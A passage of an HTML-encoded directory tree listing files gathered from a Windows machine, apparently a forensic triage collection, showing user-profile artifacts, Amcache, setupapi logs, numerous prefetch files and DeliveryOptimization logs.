&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; Microsoft Edge.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Protect
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; S-1-5-21-3871582759-1638593395-315824688-1002
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; abceede9-fb3c-4a7e-b6e8-094d87f6fbbd
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Preferred
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Windows
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; PowerShell
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PSReadline
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; ConsoleHost_history.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; Recent
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AutomaticDestinations
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 5f7b5f1e01b83767.automaticDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; dd7c3b1adb1c168b.automaticDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; f01b4d95cf55d32a.automaticDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CustomDestinations
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 590aee7bdd69b59b.customDestinations-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ms-gamingoverlay--kglcheck-.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; The Internet.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; Start Menu
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                 &#9492;&#9472;&#9472; Programs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9492;&#9472;&#9472; OneDrive.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Desktop
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Microsoft Edge.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NTUSER.DAT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; ntuser.dat.LOG1
&#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Windows
&#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; AppCompat
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Programs
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Amcache.hve
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Amcache.hve.LOG1
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Amcache.hve.LOG2
&#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; inf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; setupapi.dev.log
&#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; prefetch
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AM_DELTA.EXE-B7261F63.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AM_DELTA_PATCH_1.435.367.0.EX-798DE6B4.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; APPLICATIONFRAMEHOST.EXE-CCEEF759.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ATBROKER.EXE-2E15A492.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AUDIODG.EXE-BDFD3029.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BACKGROUNDTASKHOST.EXE-A89D33B8.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BACKGROUNDTRANSFERHOST.EXE-CF5B50C1.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CMD.EXE-4A81B364.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; COMPATTELRUNNER.EXE-DB97728F.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CONHOST.EXE-1F3E9D7E.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CONTROL.EXE-817F8F1D.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CSRSS.EXE-3FE41F7E.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DEFRAG.EXE-588F90AD.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DLLHOST.EXE-28A8211F.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DLLHOST.EXE-504C779A.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DLLHOST.EXE-570206E5.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DLLHOST.EXE-5E46FA0D.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DLLHOST.EXE-B8630D6F.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DLLHOST.EXE-D8E67ED6.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DLLHOST.EXE-FC981FFE.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EXPLORER.EXE-A80E4F97.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; GAMEBAR.EXE-912EAA91.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; GKAPE.EXE-F0554A53.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; GKAPE.EXE-F5F0B33B.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; IDENTITY_HELPER.EXE-6B964A14.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; IPCONFIG.EXE-912F3D5B.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; KAPE.EXE-E008D008.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCKAPP.EXE-59620D5A.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOGONUI.EXE-09140401.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MICROSOFTEDGEUPDATE.EXE-C4317749.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MMC.EXE-F5DC4F82.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MOBSYNC.EXE-C5E2284F.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MOUSOCOREWORKER.EXE-681A8FEE.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MPCMDRUN.EXE-041C7AA5.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MPSIGSTUB.EXE-6CB27A06.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSCORSVW.EXE-57D17DAF.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSCORSVW.EXE-C3C515BD.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGE.EXE-78F14B85.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGE.EXE-78F14B86.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGE.EXE-78F14B89.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGE.EXE-78F14B8D.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGEWEBVIEW2.EXE-FEC6EA5D.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGEWEBVIEW2.EXE-FEC6EA5E.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGEWEBVIEW2.EXE-FEC6EA5F.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGEWEBVIEW2.EXE-FEC6EA60.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGEWEBVIEW2.EXE-FEC6EA61.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSEDGEWEBVIEW2.EXE-FEC6EA65.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NETSH.EXE-F1B6DA12.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NGEN.EXE-AE594A6B.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NGEN.EXE-EC3F9239.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NOTEPAD.EXE-D8414F97.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ONEDRIVE.EXE-EA0F5C7A.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Op-SEARCHAPP.EXE-0F10B1A6-00000002.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PING.EXE-7E94E73E.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; POWERSHELL.EXE-920BBA2A.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RDPCLIP.EXE-9067FA0E.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; REG.EXE-E7E8BD26.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNDLL32.EXE-178B4978.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNDLL32.EXE-23EA2E5B.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNDLL32.EXE-CF0EC82C.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNDLL32.EXE-E7913772.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-005D3145.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-25819C5C.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-72C0C855.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-757E9611.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-94A02D86.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-98F22970.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-B0371F78.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-CF3B7A99.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-D9106866.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-E70C9E46.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RUNTIMEBROKER.EXE-F4C9B956.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SCHTASKS.EXE-5CA45734.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SEARCHAPP.EXE-42595928.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SEARCHAPP.EXE-C0170CFD.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SEARCHFILTERHOST.EXE-77482212.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SEARCHPROTOCOLHOST.EXE-0CB8CADE.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SECURITYHEALTHHOST.EXE-A928C304.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SECURITYHEALTHSERVICE.EXE-EE3BC4CB.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SECURITYHEALTHSYSTRAY.EXE-41AD6DE1.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SESSIONMSG.EXE-B52942BF.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SETHC.EXE-6A2DC453.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SGRMBROKER.EXE-0CA31CC6.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SHELLEXPERIENCEHOST.EXE-EF3EE583.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SHUTDOWN.EXE-E7D5C9CC.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SLUI.EXE-724E99D9.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SMARTSCREEN.EXE-9B5E4173.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SPPSVC.EXE-B0F8131B.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SSH.EXE-C88A8FBA.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; STARTMENUEXPERIENCEHOST.EXE-D80E778C.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-033BBABB.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-090AEBE5.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-0B3A9016.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-25616620.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-2C71F80E.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-2D56ECA4.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-2F0E0AF4.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-481FFCC8.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-4BA0E729.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-5AC380EC.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-7AC6742A.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-7CFEDEA3.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-80F4A784.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-8102A33C.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-871F52B2.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-8A87D622.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-9F4DB6F5.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-A7CE0A80.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-AE7DB802.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-B25CCDFF.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-C49E779A.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-D217A328.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-DCBDF9F5.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-E3D0CD52.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-E45D8788.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-EDE0F878.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SVCHOST.EXE-EE1C9ACA.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SYSTEMINFO.EXE-1905EE9D.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SYSTEMPROPERTIESADVANCED.EXE-68C7C4F0.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SYSTEMSETTINGS.EXE-01D72268.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TASKHOSTW.EXE-3E0B74C8.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TEXTINPUTHOST.EXE-95832A05.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TIWORKER.EXE-2CC5645B.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TRUSTEDINSTALLER.EXE-3CC531E5.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TSTHEME.EXE-14AC78EA.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; USOCLIENT.EXE-5A8A3A5E.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; VMTOOLSD.EXE-CD82EC13.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; VMWARERESOLUTIONSET.EXE-79C811DD.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; VSSVC.EXE-B8AFC319.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WERFAULT.EXE-E69F695A.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WERMGR.EXE-0F2AC88C.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WEVTUTIL.EXE-EF5861C4.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WINLOGON.EXE-B020DC41.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WINSAT.EXE-DE36CB46.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WLRMDR.EXE-C2B47318.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WMIADAP.EXE-F8DFDFA2.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WMIAPSRV.EXE-29F35ED0.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WMIPRVSE.EXE-1628051C.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WUAUCLT.EXE-70318591.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WUDFHOST.EXE-AFFEF87C.pf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WWAHOST.EXE-3FD45057.pf
&#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ServiceProfiles
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocalService
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NTUSER.DAT
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NTUSER.DAT.LOG1
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; NTUSER.DAT.LOG2
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; NetworkService
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; AppData
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Local
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Windows
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; DeliveryOptimization
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                 &#9492;&#9472;&#9472; Logs
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; domgmt.20250421_104627_712.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; domgmt.20250421_174342_214.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; domgmt.20250814_163714_952.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; domgmt.20250815_210725_523.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; domgmt.20250820_165449_024.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; domgmt.20250824_225010_773.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; domgmt.20250825_195610_790.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250421_104551_025.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250814_162958_655.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250815_210643_463.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250815_211435_096.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250815_212351_064.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;                     &#9500;&#9472;&#9472; dosvc.20250815_213331_377.etl
